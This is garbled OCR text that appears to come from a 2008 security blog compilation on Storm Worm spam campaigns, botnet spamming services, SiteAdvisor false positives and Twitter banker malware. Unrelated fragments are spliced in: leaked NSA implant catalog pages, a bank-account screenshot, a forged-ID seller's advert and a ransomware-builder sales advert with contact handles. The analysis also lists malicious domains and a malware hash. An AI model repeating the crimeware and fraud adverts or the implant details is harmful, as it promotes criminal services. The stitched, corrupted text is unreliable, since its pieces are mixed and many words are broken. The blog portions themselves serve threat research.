ANT Product Data 


(TSIISUIREL) SOMBERKNAVE is Windows XP wireless software implant | 08/05/08 


that provides covert internet connectivity for isolated targets. 


(TSI/SUIREL) SOMBERKNAVE is a software implant that surreptitiously routes 
TCP traffic from a designated process to a secondary network via an unused 
embedded 802.11 network device. If an Internet-connected wireless Access 
Point is present, SOMBERKNAVE can be used to allow OLYMPUS or 
VALIDATOR to “call home” via 802.11 from an air-gapped target computer. If 
the 802.11 interface is in use by the target, SOMBERKNAVE will not attempt 
to transmit. 


(TSIISWIREL) Operationally, VALIDATOR initiates a call home. 
SOMBERKNAVE triggers from the named event and tries to associate with an 
access point. If connection is successful, data is sent over 802.11 to the ROC. 
VALIDATOR receives instructions, downloads OLYMPUS, then disassociates 
and gives up control of the 802.11 hardware. OLYMPUS will then be able to 
communicate with the ROC via SOMBERKNAVE, as long as there is an 
available access point. 


a ok ~~ 


f 


SOMBERKNAVE 
Status: Available - Fall 2008 Unit Cost: $50k 
Poc: $3223, MMM 2 <2 cov Derived From: NSAICSSM 2-52 
ALT PoC: $3223, _— nsa.ic.gov Destanaity On: 25530008 
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"- High quality and percentage of spam delivery 

- Fast speed of delivery 

- Spam database on behalf of the vendor, or using your own database of harvested emails 
- Easily obtainable and segmented spam databases on per country basis 


- Randomization of the spam email’s body and headers in order to achieve a higher de- 
livery rate 


- Support for attachments, executables, and image files 


The cost - $100 for a million for letters delivered spam, with the large volume of spam 
discounts 20 % -30 % -40 % based on the value-added Do-it-yourself customer interfare based 
on a multi-user botnet command and control interface : 


- Automatic RBL verification 
- Support for many subjects, headers, 
- Total customization of the email sending process 


- Autogenerating junk content next to the spammers email/link in order to bypass filter- 
ing 


- Faking Outlook Message ID / Boundary / Content-ID 


- Interface added. Now do not necessarily understand all the features into the system 
to start the list. 


- Convenient management tasks. 


- A high percentage of punching, on the basis of good europe - 40-60 % (For the United 
States - less because there aol and others). 


- Improved metrics, whether or not the emails have been sent, lost, unknown receipt, or 
have been RBL-ed 


With the weight of a billion - even discounts and the possibility of making a personal 
server. " 
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Rather surprising, they state that European email users have a higher probability of re- 
ceiving the spam message compared the U.S due to AOL. What they’re actually trying to say 
is due to AOL’s use of Domain Keys Identified Mail (DKIM). As far as [2]localization of the spam 
to the email owner’s native language is concerned, this segmentation concept has been take 
place for over an year now. 


RESPONSE 


EMAIL RESPONSES 300 
Scenario (1): New Laptop 


B® Clicked Link 


bob.smith@yourcompany.com Marketing Dept Sun Sep 09 21:09:10 -0400 2007 


jane.doe@yourcompany.com Front Office Sun Sep 09 21:11:01 -0400 2007 
kevin.smith@yourcompany.com Front Office Sun Sep 09 21:13:03 -0400 2007 
jack.loe@yourcompany.com Front Office Sun Sep 09 21:14:23 -0400 2007 
jason.smith@yourcompany.com Front Office Sun Sep 09 21:14:44 -0400 2007 
jack.smith@yourcompany.com Marketing Dept Sun Sep 09 21:15:10 -0400 2007 
mike.doe@yourcompany.com Front Office Sun Sep 09 21:16:01 -0400 2007 
ron.smith@yourcompany.com Front Office Sun Sep 09 21:16:03 -0400 2007 
aaron.loe@yourcompany.com Front Office Sun Sep 09 21:16:23 -0400 2007 
jaime.smith@yourcompany.com Front Office Sun Sep 09 21:17:44 -0400 2007 
sam.smith@yourcompany.com Marketing Dept Sun Sep 09 21:18:13 -0400 2007 
bob.doe@yourcompany.com Marketing Dept Sun Sep 09 21:19:21 -0400 2007 
Aianra emithMuaiirramnany cam Marlatinn Nant Gitn Can NG 391+10+AQ _NANN INNF 


This service, like the majority of others rely entirely on malware infected hosts, which due to 
the multi-user nature of most of the malware command and control interfaces, allows them to 
easily add customers and set their privileges based on the type of service that they purchase. 
This leaves a countless number of opportunities for targeted spamming, and yes, spear 
phishing attacks made possible due to the segmentation of the emails based on a country, 
city, even company. 


In the long term, the people behind spamming providers, web malware exploitation kits and 
[3]DIY phishing kits, will inevitably start introducing built-in features which were once available 
through third-party services. For instance, hosting infrastructure for the spam/phishing/live 
exploit URLs, or even managed fast-flux infrastructure, have the potential to become widely 
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available if such optional features get built-in phishing kits, or start getting offered by the 
spamming provider itself. And since the affiliate based model seems to be working just fine, 
the [4]longoing underground consolidation will converge providers of different underground 
goods and services, where everyone would be driving customers to one another’s services 
and earning revenue in the process. 


http: //ddanchev. blogspot .com/2007/10/managed- spamming- appliances-future-of .html 
http: //ddanchev.blogspot . com/2008/05/segmenting-and-localizing-spam.htm 


1. 

2. 

3. http: //ddanchev.blogspot . com/2008/05/diy-phishing-kits-introducing-new.htm 

4. http://ddanchev. blogspot .com/2007/12/phishers- spammers-and-malware-authors. html 


4.7.38 Storm Worm’s Lazy Summer Campaigns (2008-07-31 12:50) 


facebook. 


The Storm Worm-ers seem to be lacking their usual creativity in respect to the usual social 
engineering attacks taking advantage of the momentum we’re used to seeing. These days 
they’re not piggybacking on real news items, [1]they’re starting to come up with new ones. 


Storm’s latest "FBI vs Facebook" campaign is an example of very badly executed one, 
lacking their usual fast-flux, any kind of social engineering common sense, as well as client 
side exploits next to centralizing all the participating domains on a single nameserver. 


Domains used : 
wapdailynews .com 
smartnewsradio .com 
bestvaluenews .com 


toplessnewsradio .com 
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Activity for... 


Transaction Results (1 - 32) for CHASE CHECKING (...9447) Next + 


[an Transactions x] Show 


Date $$$ Type Description Debit Credit = Balance 


Pending Misc. Debit POS DEBIT MCDONALD'S M6780 OF TX EL PASO Tx @ $7.03 


Pending Misc. Debit POS DEENT CIRCLE K 06454 EL PASO Tx @ $3.88 


03/21/2012 ACHDeb& = 8=STATE FARM RO 27 SFPP PPD ID: 9000307001 $84 82 $393.29 
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companynewsnetwork .com 
goodnewsgames .com 
marketgoodnews .com 
fednewsworld .com 
toplessdailynews .com 
stocklownews .com 


124,120.0.018 ———_—_—"S_e 4S7470 


lai 


124.120.35.67 ——Tge ppp-124-120-35-67.revip2.asianet.co.th 


ns. brprbgok6.com 


ns2.brprbgok6.com 


ns3.brprbgok6.com 


toplessnewsradio.com 


ns4.brprbgok6.com AS? 


nsS.brprbgok6.com 


ns6.brprbgok6.com 


DNS servers : 
NS.BRPRBGOK6 .COM 
NS2.BRPRBGOK6 .COM 
NS3.BRPRBGOK6 .COM 
NS4.BRPRBGOK6 .COM 
NS5.BRPRBGOK6 .COM 


NS6.BRPRBGOK6 .COM 


Strangely, the domain has been registered using an email hosted on a known Storm 
fast-flux node used in the recent [2]4th of July campaign and the [3]U.S’s invasion of Iran : 


1746 


17437 


17438 


17439 


17440 


e BIICONss 


a) 


17441 


17442 


Administrative Contact: 

Lee Chung lee@likethisonel.com 
+13205897845 fax: 

1743, 34 

Los-Angeles CA 321458 


uS 


This Storm Worm sample is also "phoning back home" over HTTP next to the P2P traffic, 
and trying to obtain the rootkit from the now down, policy-studies.cn /getbackup.php using 
already known Storm nameservers : 


ns2.verynicebank .com 
ns3.verynicebank .com 
ns.likethisonel .com 
ns2.likethisonel .com 
ns3.lollypopycandy .com 


ns4.lollypopycandy .com 


Someone's bored, definitely, making it look like it’s almost someone else managing a 
Storm Worm campaign on behalf of them. 


1. http: //honeyblog. org/archives/197-New-Storm-Campaign-Amero.htm 
2. http://blogs .zdnet .com/security/?p=1440 


3. http://ddanchev. blogspot .com/2008/07/storm-worms-us-invasion-of-iran.htm 


4.8 August 


4.8.1 Summarizing July’s Threatscape (2008-08-01 23:02) 
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Dancho Danchev's Blog - Mind Streams of 
information Security Knowledge 


July’s threatscape - consider going through [1]June’s summary as well - once again demon- 
strated that nothing is impossible, the impossible just takes a little longer where the incentive 
would be the ultimate monetization of the process. 


Russian hacktivists attacking Lithuania and Georgia, several Storm Worm campaigns, a 
couple of new malware tools, Neosploit team abandoning support for their web malware ex- 
ploitation kit, CAPTCHA for several of the most popular free email providers getting efficiently 
attacked in order to resell the bogus accounts registered in the process, several copycat SQL 
injects next to the evasion techniques applied by the copycats, botnets continuing to commit 
click fraud and generate revenue for those who own or have rented them, an infamous money 
mule recruitment service taking advantage of the fast-fluxed network provided by the ASProx 
botnet - pretty interesting month indeed. 


01. [2]Decrypting and Restoring GPcode Encrypted Files - 


The GPcode authors read the news too, and are catching up with the major weaknesses 
pointed out in their previous release in order to come with a virtually unbreakable algorithm. 
And since more evidence of [3]who’s behind the GPcode ransomware was gathered, vendors 
and independent researchers realized that the latest release is also susceptible to a plain 
simple flaw, namely the encrypted files were basically getting deleting and not securely 
erased making them fairly easy to recover. 


02. [4]Chinese Bloggers Bypassing Censorship by Blogging Backward - 


When you know how it works, you can either improve, abuse or destroy it in that very 
particular order. Chinese bloggers are always very adaptive in respect to spreading their 
message by obfuscating their messages in a way that common keywords filtering software 
wouldn’t be able to pick them. 
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Total Balance 


US$24,656.14 


US$276.18 (1.13%) 
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The best HQ IDs 3 Documents Scans for whatever you can think of 
all of my ids is high quality They contain original hologram. Before purchasing 
I will need you to send a CLEAR faceshot 
I will photoshop the photo and add it in the ids 


All States in USA, Nederland. UK, Denmark, Italy, German, Brazil, Latvia 
France, singaphore, Malaysia, Indonesia, Albania, Australia, Belgium, Hawai 
Nova Scotia, Canada, Etc 


We also provide ssn, creditcard, utility bills, bank statement, selfie, 


telegram : @Godincorporated 
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03. [5]Gmail, Yahoo and Hotmail’s CAPTCHA Broken - 


This has been an urban legend for a while, but with more services starting to offer hun- 
dreds of thousands of pre-registered accounts at these providers, it’s surprising that [6]spam 
and phishing emails coming from legitimate email providers is increasing. The "vendors" 
behind these propositions are naturally starting to "vertically integrate" by offering value- 
added services for extra payments, namely, scripts to automatically abuse the pre-registered 
accounts for automatic registration of splogs and anything else malicious or blackhat SEO 
related. 


04. [7]The Antivirus Industry in 2008 - 


If it were anyone else but a security vendor to come up with such a realistic cartoon 
aiming to stimulate innovation by emphasizing on how prolific and sophisticated malware 
groups have become, it would have been a biased cartoon. However, this one is courtesy of a 
security vendor, and it’s pretty objective. 


05. [8]Lithuania Attacked by Russian Hacktivists, 300 Sites Defaced - 


This attack is a good example of a decent PSYOPS operation. Of course they have al- 
ready build the capabilities to deface and even execute DDoS attacks against Lithuania, so 
why not put them in a "stay tuned" mode, by speculating on the upcoming attack and then 
executing it making it look like they delived what they’ve promised? This a lone gunman 
mass defacement given that the sites were all hosted on a single ISP, with no indication of 
any kind of coordination whatsoever. The same for the [9]Georgia President’s web site which 
was under DDoS attack from Russian hackers later this month. Despite that the hacktivists 
behind it dedicated a separate C &C for the attack, one that hasn’t been used in any type of 
previous attacks so far, they did a minor mistake by using a secondary command and control 
location that’s known to have been connected with a particular "botnet on demand" service 
in the past. The second attack once again proves that you don’t need to build capacity when 
you can basically outsource the process to someone else. 


06. [10]The ICANN Responds to the DNS Hijacking, Its Blog Under Attack - 


The ICANN finally issued a statement concerning the DNS hijacking of some of their do- 
mains, which is in fact what Comcast.net and Photobucket.com should have done as well, 
next to stating it was a "glitch". The ICANN also took advantage of the moment and also 
pointed out that their blog has also been under attack during the month. There’s no better 
example of how the combination of [11]tactics can result in the hijacking of the domains of the 
organizations implementing procedures aiming to protect against these very same attacks. 
And while Photobucket.com remained silent during the entire incident, the hosting provider 
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that was used by the Netdevilz team in the two attacks, since they were also responsible 
for the ICANN and IANA DNS hijackings, [12]technological and social engineeringissued a 
statement. 


07. [13]The Risks of Outdated Situational Awareness - 


Security vendors are often in a "catch-up mode" and if | were an average Internet user 
not knowing that real-time situational awareness speaks for the degree to which my vendor 
knows what going on online, I’d be pretty excited. However, I’m not. [14]Prevx were catching 
up with a service which | covered approximately two months ago, | even had the chance to 
constructively confront with one of the affected sites on how despite their security measures 
in place, this attack was still possible. Recently [15]Prevx have once again demonstrated an 
outdated situational awareness by coming across a banking malware in July 2008, whereas 
the malware has been around since July 2007, and earlier depending on which version you're 
referring to. 


08. [16]Fake Porn Sites Serving Malware - Part Two - 


Yet another domain portfolio of fake porn sites serving rogue codecs and live exploit 
URLs, just the tip of the iceberg as usual, however their centralization is greatly assisting in 
tracking them down. 


09. [17]Storm Worm’s U.S Invasion of Iran Campaign - 


Stormy Wormy is once again making the headlines with their ability to actually make up 
the headlines on their own. 


10. [18]Mobile Malware Scam iSexPlayer Wants Your Money - 


The best scams are the ones to which you've personally agreed to be scammed with 
without even knowing it. Like this one, which was tracked down and analyzed a couple of 
hours once a uset tipped on it. 


11. [19]The Template-ization of Malware Serving Sites - 


The increase of fake porn and celebrity sites is due to the overall template-ization of 
these, with the people behind them basically implementing several malicious doorways to 
ensure that the domains get rotated on the fly. Despite that they all look the same, they 
all sever different type of malware, and zero porn of celebrity content at all except the 
thumbnails. 
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12. [20]Violating OPSEC for Increasing the Probability of Malware Infection - 


No better way to expose your affiliations and several unknown bad netblocks so far, by 
adding the netblocks and the malicious domains as trusted sites upon infecting a PC with the 
malware. Of course, the usual suspects lead the "trusted netblocks". 


13. [21]Monetizing Compromised Web Sites - 


Several years ago, a script kiddie would install Apache on a mail server, they claim that 
they defaced it. Today, these amusing situations are replaced by monetization of the compro- 
mised sites, by reselling the access to them to blackhat SEO-ers, malware authors, phishers, 
or personally starting to manage a scammy infrastructure on them, by earning money on an 
affiliate based model, like this particular attack. 


14, [22]Malware and Office Documents Joining Forces - 


A recent DIY malware kit, sold as a proprietary tool basically crunching out malware in- 
fected office documents, whose built-in obfuscation makes them harder to detect. It will 
sooner or later leak out, turning into a commodity tool, a process that’s been pretty evident 
for web malware exploitation kits as well. 


15. [23]Are Stolen Credit Card Details Getting Cheaper? - 


Depends on who you’re buying them from, and whether or not they offer discounts on a 
volume basis, namely the more you buy the cheaper the price of a card is supposed to get. 
With the current oversupply of stolen credit card details, what used to be an exclusive good 
once where they could enjoy a higher profit-margin, is today’s commodity good. 


16. [24]The Neosploit Malware Kit Updated with Snapshot ActiveX Exploit - 


Since alll the web malware exploitation kits are open source, and leaked in the wild at 
large, their modularity allows everyone to easily embed any type of exploit that they want to, 
resulting in Neosploit’s single most beneficial feature, the fact that certain versions include all 
the publicly available exploits targeting Internet Explorer, Firefox and Opera. Moreover, the 
open source nature of the kit is resulting in a countless number of modified versions yet to be 
detected and analyzed, therefore keeping track of the exploits included in a malware kit can 
only be realistic if you take into considered the exploits that come with the default installation. 
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17. [25]Obfuscating Fast-fluxed SQL Injected Domains - 


Now that’s a very good example of different tactics combined to attack, ensure surviv- 
ability, and apply a certain degree of evasion in between. 


18. [26]The Unbreakable CAPTCHA - 


There’s never been a shortage of ideas, there’s always been an issue of usability. 


19. [27]The Ayyildiz Turkish Hacking Group VS Everyone - 


That’s a pretty inspiring mission if you are to ensure your future in the next couple of 
years, by targeting everyone, everywhere that has ever publicly stated their disagreement 
with the Turkish foreign policy. 


20. [28]Money Mule Recruiters use ASProx’s Fast Fluxing Services - 


A true multitasking in action with a botnet that’s been crunching out phishing emails, 
SQL injecting and now hosting a well known money mule recruitment service. 


21. [29]SQL Injecting Malicious Doorways to Serve Malware - 


Constantly switching tactics and combining different ones to achive an objective that 
used to be accomplished by plain simple techniques, is only starting to take place. In this 
case, instead of a hard coded SQL injected domain, we have the typical malicious doorways 
the result of the converging traffic management tools with web malware exploitation kits. 


22. [30]Impersonating StopBadware.org to Serve Fake Security Warnings - 


Typosquatting popular security vendors and services is nothing new, by having HostFresh 
providing the hosting for the parked domains promoting the rogue security software, is a 
privilege and flattery for the success of the Stopbadware initiative. 


23. [31]Coding Spyware and Malware for Hire - 


Customerization - not customization - has been taking place for a while, that’s the pro- 
cess of tailoring your upcoming products to the needs of your future customers, compared to 
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the product concept myopia where the malware coder would code something that he believes 
would be valuable to the potential customers. End user agreements, issuing licenses for the 
malware tool, as well as forbidding the reverse engineering of the malware so that no remotely 
exploitable flaws could be, are among the requirements the coder assists on. 


24. [32]Lazy Summer Days at UkrTeleGroup Ltd - 


Taking a random snapshot of the current malicious activity at a well known provider of 
hosting services for rogue security applications, live exploit URLS and botnet command 
&control locations, always provides an insight into what are their customers up to. In this case, 
centralization of their scammy ecosystem, and parking a countless number of rogue domains 
on the same server. 


25. [33]Email Hacking Going Commercial - 


Cybercrime is in fact getting easier to outsource, and while the number of scammers 
trying to offer non-existent services, or at least services where they cannot deliver the goods, 
the business model of this service that is that you only pay once they show you a proof that 
they’ve managed to hack the email address you game them. How are they doing it? Social 
engineering and enticing the user to click on live exploit URL from where they’ll infect the 
PC and obtain the email password, of course, next to definitely abusing it for many other 
purposes in the process. 


26. [34]Vulnerabilities in Antivirus Software - Conflict of Interest - 


You can easily twist the number of vulnerabilities found in your antivirus solution, but 
not recognizing them as vulnerabilities at the first place. It’s all a matter of what you define as 
a vulnerability, or perhaps what you admit as a serious vulnerability - remote code execution 
through a security software, or a flaw that’s allowing malware to bypass the security solution 
itself. 


27. [35]Counting the Bullets on the (Malware) Front - 


Emphasizing on the number of malware/threats/viruses/worms/slugs your solution detects 
may be marketable in the short-term, but is damaging the end user’s understanding of the 
threatscape in the long-term. So, by the time he catches up with what exactly is going on, he'll 
recall the moment in time where he was using the number of threats his solution was detecting 
as the main benchmark for its usefulness. In reality through, the number is irrelevant from a 
pro-active point of view, with zero day malware like the one coded for hire undermining the 
signatures based scanning model. 
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28. [36]Smells Like a Copycat SQL Injection In the Wild - 


It was pretty obvious that copycats seeing the success of SQL injections the the huge 
number of sites susceptible to exploitation, would also starting taking advantage of the 
practice. Some are, however, targeting local communities and trying to avoid detection by 
using targeted SQL injections. 


29. [37]Click Fraud, Botnets and Parked Domains - All Inclusive - 


The scheme is nothing new, what’s new is that the botnet masters are trying to limit 
the revenues that used to go out to affiliate networks they were participating in, and are trying 
to own or rent the entire infrastructure on their own. 


30. [38]Over 80 percent of Storm Worm Spam Sent by Pharmaceutical Spam Kings - 


With access to Storm Worm sold and resold, and new malware introduced on Storm Worm 
infected hosts used as foundation for the propagation of the new malware in this case, it’s 
questionable whether or not the Storm Worm-ers themselves are sending out the junk emails, 
or are they people who’ve rented access to the botnet doing it. 


31. [39]Neosploit Team Leaving the IT Underground - 


Pretty surprising at the first place, but in reality it clearly demonstrates that when you 
cannot enforce the end user agreement on your crimeware kit, but continue seeing it used 
in a very profitable malware operations, you basically shut down the support for the public 
version. The team is not going to stop innovating for their own purposes, and in the long-term 
they may in fact re-appear with an updated malware kit that’s converging different services 
next to the product itself. 


32. [40]Dissecting a Managed Spamming Service - 


Managed spamming services using botnets as the foundation for the campaigns are starting 
to introduce improved metrics for the delivery, as well as experienced customer support 
ensuring the spam messages make it through spam filters, or at least increase the probability 
of making the happen. This is an example of a random service emphasizing on the improved 
metrics they’re capable of delivering. 


33. [41]Storm Worm’s Lazy Summer Campaigns - 
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Looks like a "cybercrime intern" launched this campaign, lacking any of the usual Storm 
Worm evasive practices, no exploitation of client side vulnerabilities, as well as no survivability 
offered by their usual fast-flux nodes. 
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4.8.2 McAfee’s Site Advisor Blocking n.runs AG - "for starters" (2008-08-04 15:26) 
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Following the recent, and now fixed [1]false positive blocking sans.org due to the already 
considered malicious dshield.org and giac.org it’s also interesting to note that n.runs AG 
(nruns.com), whose [2]research into vulnerabilities in antivirus products received a lot of 
attention lately, is also flagged as [3]a dangerous site. 


Excluding the conspiracy theories, a false positive when your solution is integrated in the 
second most popular search engine is bad, especially when other [4]Jautomated crawling 
approaches are successfully detecting the site as a non-malicious one. How come? It’s alla 
matter of how you define malicious activity, and what exactly are you trying to protect your 
users from. 


Web | image 


foams ruthewska Search - . YaHoo! 
~. Sp Seach: 3 

Also try: joanna rutkowska researcher, joanna rutkowska roove!, More _ 

A 2 potentially hanntul websit ark 


Joi Dangeroes Downloads J icyclopedia 
Joa opedia. Jump to: navigation, search ... 
Joa Please use caution before downloading ervatity kine for hee ... 
ena Sything at thes site. Download eta 
s virus oF other undesirable sofware 


tsi @e a ee MeAdee joter Hof over at the"... posted by joanna at 


ex and | wil be presenting “Xen ... Older news have 
004-2008 Jeanna Ruthewska _.. 


In this case, Site Advisor seems to be trying to protect the end user from herself, but flagging 
sites hosting some sort of hacking/pen-testing tool in a clear directory structure, since 
SiteAdvisor isn’t capable of automatically flagging a SQL injected site as a malicious one, the 
approach it takes for assessing whether or not a specific site is malicious is flawed, namely 
integrating McAfee’s signatures based malware database and flagging a site hosting anything 
detected as malware as a badware site itself. [5]McAfee’s comments: 
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"Our tests are very accurate," Dowling said. "The frequency of false positives is fewer than 
one a month. Changes in classifications we make are almost always because sites have 
changed their behaviour. "The email tests are the ones than have the most false positives. 
Users can have confidence in our ratings." 


Mid East Hackers Challenge offers cash 
A Warming: Dangerous Downloads | 


Hack In The Box (HITB 


DFIZeS 


Hac Dangerous Downloads £3 |t 4 will be hosting a Capture ... Add Hack In 

The nified when new... 

ww" Please use caution before downloading 
anything at this site. Downloads may contain . 
a virus or other undesirable software prin the Middle East | Hack In... 
More details 


| that for the second time, it will be bringing 


— P Cas . Blow 
4 SearchSc — = powered by McAfee searchers to the Middle East 


t 1 
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Hack In The Bix 


In March of 2005, the Japanese FTC issued a decision that found WKK ... This article is from Hack 
In The Box. http:/Awww.hitb.org/ The URL for this story is: ... 
www. hith.org/print, php? sid=24120 - 


There are even more surprising false positives, such as, Hack in the Box security conference, 
Defcon.org, Zone-H France, Invisiblethings.org, AME Info - Middle East business and 
financial news and more : 


[6]milwOrm.com 
[7 ]hackinthebox.org 
[8]defcon.org 


[9]hitb.org 
[10]invisiblethings.org 
[11]zone-h.fr 
[12]ussrback.com 


[13 ]ameinfo.com 


Take for instance the Hack in the Box security conference, which is considered as the 
[14]download publisher of a file hosted at packetstormsecurity.org. What’s interesting to 
point out is that just like a huge percentage of already flagged as potentially harmful sites 
that haven’t been re-checked in months, with Hack in the Box’s case the link was last 
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publick 


>»> HACTPOMKH CEOPKH « 


+ pacwupeHve y 3awucbpoBaHHbix Chavnos 
+ CNUCOK PacwupeHHY WHdpyembix (bavnnos 
anroputTM wucppoBaHMA -------------------- -- 
(RSA-AES, BnuseT Ha CKOPOCTb) 
+ METOQ WHChpOBaHuA: BECb Chavn unu YacTb 
+ konMueCTBO ChavnoB-TpebosaHun 
+ uMeHa Cbavinam-TpebosaHnam 
+ TeEKCT cbavina tpebosanua 
-- (TONbKO Ans offline ver.) 
+ KaTanor cbavna Kkniova 
(TONbKO Ansa offline ver.) 
+ uma chavina Kniova (TtoneKko ana offline ver.) 
+ aBTO3arpy3ka (BKN/BbIKN) 
+ FEOMOAYNb (BKN/BbIKN, CTPaHb!) 


private 


>> SETTINGS BUILD << 


extension for encrypted files + 

list of extensions of encrypted files + 
encryption algorithm (RSA-AES, affects speed) + 
encryption method: entire file or part + 

number of file-requirements + 

names to file-requirements + 

text of the file-requirement (only for offline ver.) + 
file-key directory (only for offline ver.) + 

file-key name (only for offline ver.) + 

autoload (on/off) + 

geomodule (on/off, countries) + 


Main sales: market.ms (bayOnet) 
Jabber: bayOnet@404.city, zagzig@exploait.im [OTR] 
Telegram: @bayOnet [PGP] 
Message to PM: [PGP] 
>> Selling through the guarantor service << 
>> Not selling inexperienced << 


17549 


17550 


TOP SECRET//COMINT//REL TO USA, FVEY 


COTTONMOUTH-I 
ANT Product Data 


(TSISWIREL) COTTONMOUTH-1! (CM-I) is a Universal Serial Bus (USB) hardware implant 08/05/08 
which will provide a wireless bridge into a target network as well as the ability to load exploit 
software onto target PCs. 


(TSISWREL) CN-! will provide air-gap bridging, software persistence capability, “in-field” re- 
programmability, and covert communications with a host software implant over the USB. The 

RF link will enable command and data infitration and exfiliration, CM-I will also communicate 

with Data Network Technologies (ONT) software (STRAITBIZARRE) through a covert b iT] 
channel implemented on the USB, using thts communication channel to pass commands and 

data between hardware and software implants. CM-1 will be a GENIE-compliant implant 

based on CHIMNEYPOOL. oe 
(TSISUREL) CM-I conceals digital components (TRINITY), USB 1.1 FS hub, switches, and 
HOWLERMONKEY (HM) RF Transceiver within the USB Series-A cable connector. 8 
MOCCASIN is the version permanently connected to a USB keyboard, Another version can 

be made with an unmodified USB connector at the other end. CM-I has the ability to 
communicate to other CM devices over the RF link using an over-the-air protocol called q 4 
SPECULATION. COTTONMOUTH CONGR 


0000) 
ro Sate lew Bee Tie 


Status: Availability - January 2009 


POC: , $3223, @nsa.ic.gov Oe Pie sn snereees 
ALT POC: $3223, @nsa.ic.gov Declassity Onc 20320108 


TOP SECRET//COMINT//REL TO USA, FVEY 


17551 


3 COST NOCHE OCUDHOR SKCKYDCIM, Atte MAAMOCT, 2aOyaMM C BION 18 BQQONAL CTOCNAarmECe, 4 NOSKEMH Ha MPaMHUy TDEX CTDSH, MOTTE VETO HAC HEN NDSXPacwel eH B HeO-AtHEeHCeCKOM 
pecTtopane Npw crene Gemeamonn 


of8x, TAHET Ha MHwAeH! Nogapunn nosapy 
IM TAK POCYYBCTBOBANCH, WyTb HE 3ANNSKSN. 


17552 


checked in February, 2008. And since hitb.org is now distributing spyware, any site that it 
links to is also flagged as badware, like hackinthebox.org itself : 


"When we tested this site we found links to hitb.org, which we found to be a distributor of 
downloads some people consider adware, spyware or other potentially unwanted programs.’ 


These sites aren’t SQL injected, IFRAME-ed or embedded with malware whatsoever, so it’s 
like flagging a gun store as a malicious store because of the inventory there - wrong 
generalization aiming to bring order into the underground chaos at the first place is prone to 
result in lots of false positives, [15]a wrong mentality that certain countries are starting to 
embrace. 


The bottom line - is the "do not visit unknown or potentially harmful sites" security tip on 
the verge of extinction? Probably, as these days, exploited legitimate sites are hosting or 
redirecting to more malware than potentially harmful sites are. 


. http://isc.sans.org/diary.html?storyid=4799 


ttp://ddanchev. blogspot .com/2008/07/vulnerabilities-in-antivirus-software.htm 


. http://www. siteadvisor.com/sites/nruns.com/downloads/15713425/ 


http://www. google. com/safebrowsing/diagnostic?site=nruns. com 


ttp://www.theregister.co.uk/2008/08/01/siteadvisor_sans_snafu/page2.htm 


_ ictp://aww. eiteadvisor.con/aites/uils0rm,com 

| http: //wwy. siteadvisor .con/eites/nackinthebor org/eumary/ 
,fctp:/ eww. eitendviaer con/sites/detcon, ond 

_hep://wwy. siteadvisor.con/eites/hitb.org 

10. http://w. oiteadvisor .con/sites/invieiblethings .org/sumary/ 
| hetp://wvy.siteadvisor con/eites/zone-h.fr/sunmary/ 

| frtp://rev.aiteudvisor con/eitea/saarback,con/eumaary] 

13, fittps//wewsoiteadviaar com/sites/aneito coq 


http: //www.siteadvisor.com/sites/hitb.org/downloads/11950271/ 
http: //ddanchev.blogspot.com/2007/07/insecure-bureaucracy-in-germany .htm 


4.8.3 Twitter Malware Campaign Wants to Bank With You (2008-08-05 11:46) 
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Select Lonquege . ¥ 


a 

Hey there! video_kelly_key is using | Join today! | 
¥ Join today! 

Twitter. 


Abeady using Twitter vie SMS or 
1M? Firesh signing up. 


Twitter is & free service that lets you keep in touch wath people using 
the web. your phone, or IM. Join today to start receiving 
video_kelly_key’s updates 
—— — 
cn video_kelly_key 
Video Pornografico da Cantora Kelly key.. 
http://player-videos-youtub... 


4 days ago from web 


video kelly key Video Pomogatico da Cantora Kelby key. hip //ptayer-video- 


In [1]what appears to be a lone gunman [2]malware campaign - where the malware spreader 
even left his email address within the binary - the now down [3]Twitter malware campaign 
managed to attract only 69 followers before it has shut down, [4]using a trivial approach for 
launching an XSS worm - [5]Cross-site request forgery (CSRF). More info : 


"This week it’s Twitter’s turn to host an attack - one that is targeting both Twitter users 
and the Internet community at large. In this case it’s a malicious Twitter profile twit- 
ter.com/[skip]/ with a name that is Portuguese for ‘pretty rabbit’ which has a photo advertising 
a video with girls posted. 


This profile has obviously been created especially for infecting users, as there is no other 
data except the photo, which contains the link to the video. If you click on the link, you get 
a window that shows the progress of an automatic download of a so-called new version of 
Adobe Flash which is supposedly required to watch the video. You end up with a file labeled 
Adobe Flash (it’s a fake) on your machine; a technique that is currently very popular." 


Video Pornografico da Cantora Kelly key.. 
http://player-video-youtube... 


08:03 PM July 12, 2008 from web 
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TOP SECRET//COMINT//REL TO USA, FVEY 


COTTONMOUTH-II 
ANT Product Data 


(TSNSWIREL) COTTONMOUTH-I (CM-I) is a Universal Serial Bus (USB) hardware Host 
Tap, which will provide a covert link over USB link into a targets network. CM-Il is imended 
to be operate with a long haul relay subsystem, which is co-located within the target | 08/05/08 
equipmem. Further integration is needed to turn this capability into a deployable system. 


(TSIISU/REL) CM-tl will provide software persistence capability, “in-field” re-programmability, 
and covert communications with a host sofware implant over the USB. CM-ll will also 
communicate with Data Network Technologies (ONT) software (STRAITBIZARRE) through a 
covert channel implemented on the USB, using this communication channel to pass 
commands and data between hardware and software implants. CM-I will be a GENIE- 
compliant implant based on CHIMNEYPOOL. 

(TSIISUIREL) CM-I! consists of the CM-I digital hardware and the long haul relay concealed 
somewhere within the target chassis. A USB 2.0 HS hub with switches is concealed in a 
dual stacked US8 connector, and the two parts are hard-wired, providing a intra-chassis link. 
The long haul relay provides the wireless bridge into the target's network. 

COTTONMOUTH - & (CM) CONOP 
ANT Covert Network Scenario 


high Side Low Sade 


Unit Cost: 50 units: $200K 


Status: Availability - September 2008 
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Let’s analyze the campaign before it was shut down. The original Twitter account used 
twitter.com/video kelly key basically included a link to player-video-youtube.sytes.net 
(204.16.252.98) which was using a URL shortening service fly2.ws/NiIOMN3 in order to 
redirect to the banker malware located at freewebtown.com/construimagens/ Play-video- 
youtube.kelly-key.com. It’s detection rate is as follows : 


Scanners Result: 14/36 (38.89 %) 
Trojan-Spy.Win32.Banker.caw 

File size: 88064 bytes 

MD5...: 25600af502758ca992b9e7fff3 739def 

SHAI..: 9262ca501ef388e0fe42c50a3d002ddbd6e254f2 


Twitter isn’t an exception to the realistic potential for [6]XSS worms though CSRF that could af- 
fect each and every Web 2.0 service, which as a matter of fact have all suffered such attempts, 
namely, [7]Orkut, [8]MySpace (as well as the [9]QuickTime XSS flaw), [10]GaiaOnline, [11]Hi5, 
and most recently the [12]XSS worm at Justin.tv, demonstrate that trivial vulnerabilities come 
handy for what’s to turn into a major security incident if not taken care of promptly. 


Related posts: 

[13]XSS The Planet 
